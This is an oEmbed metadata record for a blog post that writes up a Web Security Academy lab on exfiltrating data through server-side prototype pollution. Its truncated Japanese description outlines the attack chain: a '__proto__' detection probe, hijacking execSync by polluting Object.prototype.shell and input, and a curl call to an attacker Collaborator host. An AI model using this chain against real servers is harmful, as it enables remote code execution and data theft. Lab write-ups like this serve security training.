{"html":"<iframe src=\"https://hatenablog-parts.com/embed?url=https%3A%2F%2Fcysec148.hatenablog.com%2Fentry%2F2025%2F09%2F16%2F080248\" title=\"Lab: Exfiltrating sensitive data via server-side prototype pollution - Shikata Ga Nai\" class=\"embed-card embed-blogcard\" scrolling=\"no\" frameborder=\"0\" style=\"display: block; width: 100%; height: 190px; max-width: 500px; margin: 10px 0px;\"></iframe>","url":"https://cysec148.hatenablog.com/entry/2025/09/16/080248","height":"190","type":"rich","provider_url":"https://hatena.blog","published":"2025-09-16 08:02:48","blog_url":"https://cysec148.hatenablog.com/","author_url":"https://blog.hatena.ne.jp/ThisIsOne/","image_url":null,"blog_title":"Shikata Ga Nai","provider_name":"Hatena Blog","author_name":"ThisIsOne","width":"100%","description":"Hello there, ('\u03c9')\u30ce \u5168\u4f53\u50cf\uff08\u4f55\u304c\u8d77\u304d\u308b\u306e\u304b\uff09 \u6c5a\u67d3\u6e90\uff1a\u30a2\u30c9\u30ec\u30b9\u5909\u66f4\u30d5\u30a9\u30fc\u30e0\u306e JSON \u3092\u305d\u306e\u307e\u307e\u30b5\u30fc\u30d0\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3078\u30de\u30fc\u30b8\u3057\u3066\u3044\u308b \u691c\u77e5\u306e\u5408\u56f3\uff1a\"__proto__\": {\"json spaces\": 10} \u3092\u5165\u308c\u308b\u3068\u3001\u30ec\u30b9\u30dd\u30f3\u30b9 JSON \u306e\u30a4\u30f3\u30c7\u30f3\u30c8\u304c\u5897\u3048\u308b \u30ac\u30b8\u30a7\u30c3\u30c8\uff1a\u30e1\u30f3\u30c6\u30ca\u30f3\u30b9\u30b8\u30e7\u30d6\uff08\u7ba1\u7406\u753b\u9762\uff09\u5185\u3067 execSync \u304c\u30aa\u30d7\u30b7\u30e7\u30f3\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u53c2\u7167 \u6ce8\u5165\uff1aObject.prototype.shell \u3068 Object.prototype.input \u3092\u8a2d\u5b9a \u2192 \u30b7\u30a7\u30eb/\u6a19\u6e96\u5165\u529b\u3092\u4e57\u3063\u53d6\u308b RCE\u78ba\u8a8d\uff1acurl https://<\u3042\u306a\u305f\u306eCollaborator\u2026","version":"1.0","categories":["Web Security Academy","Prototype pollution"],"title":"Lab: Exfiltrating sensitive data via server-side prototype pollution"}